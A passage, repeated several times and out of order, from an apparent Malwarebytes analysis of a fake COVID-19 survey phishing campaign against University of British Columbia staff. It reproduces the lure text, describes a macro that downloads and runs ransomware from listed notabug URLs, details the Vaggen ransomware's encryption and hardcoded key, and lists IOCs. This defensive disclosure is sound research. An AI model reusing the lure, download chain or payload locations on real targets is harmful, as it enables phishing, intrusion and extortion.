be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 291 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 292 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 293 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 294 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 295 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 296 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 297 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 298 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 299 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 300 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 301 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 302 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 303 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 304 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 305 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 306 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 307 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 308 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 309 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 310 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 311 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 312 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 313 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 314 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 315 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 316 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 317 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 318 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 319 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 320 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 321 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 322 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 323 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 324 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin 